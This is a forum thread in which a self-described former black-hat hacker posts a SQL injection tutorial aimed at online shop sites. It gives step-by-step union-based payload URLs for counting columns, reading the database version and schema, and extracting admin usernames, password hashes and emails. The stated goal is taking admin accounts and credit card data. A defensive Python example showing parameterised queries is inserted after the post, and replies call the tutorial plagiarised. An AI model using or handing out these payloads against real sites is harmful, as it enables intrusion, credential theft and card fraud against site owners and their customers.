WebSite Hacking Full [Tut]

Ethical_World

Member
Mar 15, 2009
Well, first I will introduce myself. I was a Black Hat hacker for 3 years. I did:
1. About 150 sites defaced
2. 5 major viruses
3. More than 200 computers boxed
4. Many, many credit card frauds

and did many things, so I can't reveal my real identity. But now I'm a White Hat hacker, an ethical hacker if you want to call it that.

So this tut was written by my own hand; I didn't copy it from anywhere,
because Elakiri deserves the best.

There are a couple of ways to hack into a website:

1. SQL injection
2. RFI
3. LFI
4. XSS
5. Other ways


Well, SQL injection is the most famous one, so I will teach you about SQL with pics!

Sql Injection

What is SQL Injection?

SQL injection is something like this. Put very simply, when you inject a site you can get:

Admin user name (root)
Admin password (root)
Other admins' passwords
Every user name
Every user password
Credit card info (every detail)


How to find out whether a site is vulnerable or not

Let's say I have a site

Code:
http://www.website.com/shop.php?id=10

To see whether it is hackable or not, put ' at the end,
so it should look like
Code:
http://www.website.com/shop.php?id=10'

And if it gives you a MySQL error, that means the site is hackable.
[Image: 1sqlerror.png]


OK, the next step.

So now we know whether the site is vulnerable or not.
Now we have to go through this to hack into admin:

1. Finding the number of columns
2. Check if UNION works.
3. Looking for a visible column
4. Check if the version is > 5
5. Extracting table names, column names, etc... (Or bruteforcing if the version is < 5)
6. Forming the finishing query to extract our required information.


Finding the number of columns

Code:
http://www.Site.com/shop.php?id=10+order+by+1--
(You should not get any error)
Code:
http://www.Site.com/shop.php?id=10+order+by+10000--
(You should get an error)

If you get an error, the next step is to get the number of columns

Code:
http://www.Site.com/shop.php?id=10+order+by+2--
http://www.Site.com/shop.php?id=10+order+by+3--
http://www.Site.com/shop.php?id=10+order+by+4--
http://www.Site.com/shop.php?id=10+order+by+5--
http://www.Site.com/shop.php?id=10+order+by+6--
http://www.Site.com/shop.php?id=10+order+by+7--
<--- Keep injecting until you get an error;
for me it's at order by 7 in my pic
[Image: cloms.png]

Check if UNION works.

So now we know our site has 6 columns, so what you should do now is
put it in order like

Code:
http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6--

Looking for a visible column

Now you should see a number on the screen somewhere. For me it's
2 (it's highlighted)

[Image: 3numbers.png]

Check if the version is > 5

Now we need to check if the version is > 5 (VERY VERY IMPORTANT STEP)
For this, I pick our visible column (in this case it is 2) and we must replace it with "@@version"

For example:
Code:
http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6--
Now you will be able to see the MySQL version like this
[Image: 4version.png]

You should FIRST CHECK IF IT IS GREATER THAN 5, now..
If it is, you can proceed, or you HAVE TO GUESS THE TABLE NAMES IF IT'S BELOW version 5.

Extracting table names, column names, etc...

Now we must get
1. Database names
2. Table names
3. Column names

Database names:

Now this is the confusing part, so stay with me.

Now we are going to get the database name and user all together, since we know the visible column

Code:
http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--
Many people get confused by "concat_ws". It actually means concat with separator, and the separator we use should be given at the start of the syntax. Here I used 0x3a, whose equivalent is ":". The main purpose of using this is getting the output in the desired format, as we need it to be. (copied)

Now let's see what these are
Version() :- Version() is used to inject the version of MySQL used on the server
User() :- This will inject the registered MySQL user in the database.
Database() :- is the database name
Now that will give you something like this
[Image: 5sigma.png]


Grab the Database using Information_schema

Code:
http://www.website.com/shop.php?id=1+UNION+SELECT+1,group_concat(schema_name),3,4,5,6+from+information_schema.schemata--
What is this?
1. +from+information_schema.schemata :- returns the databases on the server
We may get the database name depending on the number of databases present.
Like if you get something like this
[Image: 6database.png]

Sigma is the database name

Extracting table names:
Now we know the database name. What we need now are the MySQL table names.
I've picked the database 'users' to extract our table names.
We have to use the database information_schema, the table tables and the column table_name to extract the respective table names.
So it should be like
Code:
http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables--
This will give you more than we need, like all the junk in the DB.

So we only need tables for the table users. So now we go with
Code:
http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema='users'--
If it doesn't respond properly, sometimes you have to hex the "users". When you hex "users" you get "0x7573657273".
So it should be like
http://www.Site.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema='0x7573657273'--
Now you should get a table name. I'll take the table USERS for example.

column names:
Now we are going to get the data from the table named "USERS", and we extract various columns from it.
Code:
www.Site.com/shop.php?id=10+UNION+SE ... olumn_name),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--
In that I have changed group_concat(table_name) to group_concat(column_name) because now we are looking for columns.
column_name extracts all column names present in the table.
And add this to the end of the columns
+from+information_schema.columns+where+table_name='USERS'--
It will show you the columns. Let's suppose they are username, password and email.
Code:
http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email),3,4+from+USERS--
Now you are done. Anyway, I only needed the admin user name, so I did it another way.
[Image: donee.png]

If it comes out as a number, you need to crack it. You can use an online MD5
cracker for that.



This is only for knowledge. I'm not responsible for what you do with this knowledge.
 
  • Like
Reactions: ac2000
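
The fix for the flaw the tutorial above relies on, as an added example that is not part of the original post: the `id` value is pasted into the SQL text in the "before" function and validated and bound as a parameter in the "after" function. It assumes an in-memory SQLite table in place of the MySQL shop database; the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the shop database: one 6-column table,
    # matching the column count in the post. All names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, "
               "price REAL, stock INTEGER, category TEXT, descr TEXT)")
    db.execute("INSERT INTO products VALUES "
               "(10, 'kettle', 19.5, 4, 'kitchen', 'steel')")
    return db

def lookup_vulnerable(db, raw_id):
    # Before: the id parameter becomes part of the SQL text, so a quote,
    # ORDER BY or UNION in the URL changes the statement itself.
    return db.execute("SELECT * FROM products WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # After: accept only a short run of ASCII digits, then bind the value as
    # a parameter so the driver never parses it as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # caller should answer 400 with a generic message
    return db.execute("SELECT * FROM products WHERE id = ?",
                      (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    # What a client could observe: the post's probes depend on telling
    # 'sql-error' apart from 'rows'.
    try:
        rows = fn(db, raw_id)
    except sqlite3.Error:
        return "sql-error"
    if rows is None:
        return "rejected"
    return "rows" if rows else "empty"

# id values taken from the URLs in the post ('+' decoded to a space)
PROBES = ["10", "10'", "10 order by 7--", "-10 Union Select 1,2,3,4,5,6--"]

def compare():
    db = make_db()
    return {p: (outcome(lookup_vulnerable, db, p),
                outcome(lookup_hardened, db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare().items():
        print(f"{probe!r:40} before={before:10} after={after}")
```

Binding closes the injection itself; returning a generic error page instead of the database message also removes the signal that the quote and ORDER BY checks depend on.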

nadman

Well-known member
  • Nov 29, 2006
    Wow good stuff bro.
    I am still in the process of reading this tute.
    I must save the page and read it slowly!
    Thanks for the info and keep posting!:)
     

    x-pert

    Member
    Jun 13, 2006
    You're saying ElaKiri deserves the best. And that you have written it by your own hand bla bla.

    This is not what ElaKiri deserves. ElaKiri is not a hacking forum.

    Teach the people how to prevent from hacking/ hackers if you're really an Ethical Hacker.

    On a second thought, this is NOT written by you.
    The rule number 1 of Ethical hacking is: give credit to others when and where it's due.
    This is an article written by curFew and DaSteem of h4cky0u.org.

    Cached source
     

    Ethical_World

    Member
    Mar 15, 2009
    x-pert said:
    You're saying ElaKiri deserves the best. And that you have written it by your own hand bla bla.

    This is not what ElaKiri deserves. ElaKiri is not a hacking forum.

    Teach the people how to prevent from hacking/ hackers if you're really an Ethical Hacker.

    On a second thought, this is NOT written by you.
    The rule number 1 of Ethical hacking is: give credit to others when and where it's due.
    This is an article written by curFew and DaSteem of h4cky0u.org.

    Cached source
    Yeah, some parts were hard to explain, so I did copy things, but not exactly copied.

    And yeah, I was an old member of h4cky0u, and I'm still in h4cky0u.
     

    shan4djfun

    Well-known member
  • Jun 18, 2007
    HACKING? THIS IS MORE LIKE COPYING.... HEY ETHICAL HOOKER, WHAT ARE THE MAJOR VIRUSES YOU DID? I'M PRETTY SURE YOU COPIED THAT TOO :lol: :P